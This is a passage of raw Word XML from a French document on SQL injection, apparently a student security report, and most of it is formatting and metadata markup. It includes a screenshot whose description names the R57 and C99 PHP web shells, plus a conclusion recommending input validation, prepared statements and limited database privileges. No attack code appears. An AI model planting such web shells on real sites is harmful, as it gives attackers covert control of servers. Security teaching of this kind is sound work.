          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181F8B6F" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30BAC013" wp14:editId="0767682E">
            <wp:extent cx="6328133" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="974934009" name="Image 7" descr="R57 Shell | C99 Shell | Shell | TXT Shell | R57.php | c99.php | r57shel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57 Shell | C99 Shell | Shell | TXT Shell | R57.php | c99.php | r57shell.n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5997" cy="2183936"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34D627" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F084BD1" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C516CDD" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649"/>
    <w:p w14:paraId="1ACA2F42" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="000A6530" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A6530">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En conclusion, la SQL injection est une technique malveillante qui peut causer de graves dommages à une base de données et compromettre la sécurité d'une application web. Pour éviter les attaques de SQL injection, il est important de mettre en place des mesures de sécurité appropriées, telles que la validation et la désinfection des entrées utilisateur, l'utilisation de paramètres de requête préparés, et la limitation des privilèges de base de données. En suivant ces bonnes pratiques de sécurité, les développeurs peuvent contribuer à prévenir les attaques de SQL injection et protéger les données sensibles des utilisateurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983A9B4"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2B12371B"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74D8E30B"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3F8B0DD7"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549EB9DC"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684D1512"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702E3FCF"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3952D419"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399F8C23" w14:textId="77777777" w:rsidR="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CFF860" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="007349C8" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46323456" w14:textId="77777777" w:rsidR="00552649" w:rsidRPr="00552649" w:rsidRDefault="00552649" w:rsidP="00552649">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00552649" w:rsidRPr="005526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Roboto">
    <w:panose1 w:val="02000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="5000205B" w:usb2="00000020" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="inherit">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Inter">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Muli">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E3FB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96B073C2"/>
    <w:lvl w:ilvl="0" w:tplc="61625FD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1069"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363A11C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC12A9B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7081445"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F5EB87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DB9407D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A22E3C8"/>
    <w:lvl w:ilvl="0" w:tplc="47307564">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1005" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1725" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2445" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040C000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3165" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3885" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4605" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040C000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5325" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6045" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6765" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5FA21560"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE28D1CC"/>
    <w:lvl w:ilvl="0" w:tplc="652A6CCE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2280" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040C000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040C000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040C0019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040C001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="73BB2ACA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5E8AB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22074557">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1986472732">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="188034165">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="868180069">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1335690320">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="3356973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49"/>
    <w:rsid w:val="002E4D2F"/>
    <w:rsid w:val="00365D8E"/>
    <w:rsid w:val="00552649"/>
    <w:rsid w:val="005572F8"/>
    <w:rsid w:val="00761777"/>
    <w:rsid w:val="00B06AE9"/>
    <w:rsid w:val="00DA60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F0A7E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2757CD00-57E4-4C50-8B15-88997194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52649"/>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Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00552649"/>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Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00552649"/>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52649"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00552649"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00552649"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00552649"/>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Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00552649"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titre1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00552649"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00552649"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00552649"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PrformatHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PrformatHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005526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fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PrformatHTMLCar">
    <w:name w:val="Préformaté HTML Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="PrformatHTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00552649"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00552649"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00552649"/>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00552649"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="005526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customXml" Target="../customXml/item2.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kali.org/downloads/" TargetMode="External"/><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hyperlink" Target="https://my.vmware.com/fr/web/vmware/downloads/info/slug/desktop_end_user_computing/vmware_workstation_player/16_0" TargetMode="External"/><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customXml" Target="../customXml/item3.xml"/><Relationship Id="rId8"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195A4893DAB84299122D2262AFDD5A" ma:contentTypeVersion="11" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="234080871528521182284ce87dbd818b">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="fb4b45e4-8d06-48e6-9043-1f15d5d6bcaf" xmlns:ns3="0ae3aa86-3e06-49e1-af14-974f37f52190" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c67218207badf9943cebb03d6c5698e0" ns2:_="" ns3:_="">
    <xsd:import namespace="fb4b45e4-8d06-48e6-9043-1f15d5d6bcaf"/>
    <xsd:import namespace="0ae3aa86-3e06-49e1-af14-974f37f521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b45e4-8d06-48e6-9043-1f15d5d6b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9ca3966c-5ee7-472e-b92e-9c8ee28c72c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e3aa86-3e06-49e1-af14-974f37f5219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387a882-d0a6-4b9e-ba42-6217d6d2790c}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="0ae3aa86-3e06-49e1-af14-974f37f521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ae3aa86-3e06-49e1-af14-974f37f52190" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="fb4b45e4-8d06-48e6-9043-1f15d5d6bca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5BD163-2F04-4BA0-9637-F5260B106A82}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{128607C4-440C-4EAC-86CE-36D7E429C417}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A1319402-0AD0-40B7-A819-C6BB3DA29AB5}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <TotalTime>8</TotalTime>
  <Pages>26</Pages>
  <Words>3633</Words>
  <Characters>19984</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>166</Lines>
  <Paragraphs>47</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>23570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hamza doukry</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hamza doukry</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-28T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-28T11:47:00Z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0x010100E7195A4893DAB84299122D2262AFDD5A</vt:lpwstr>
  </property>
</Properties>
</file>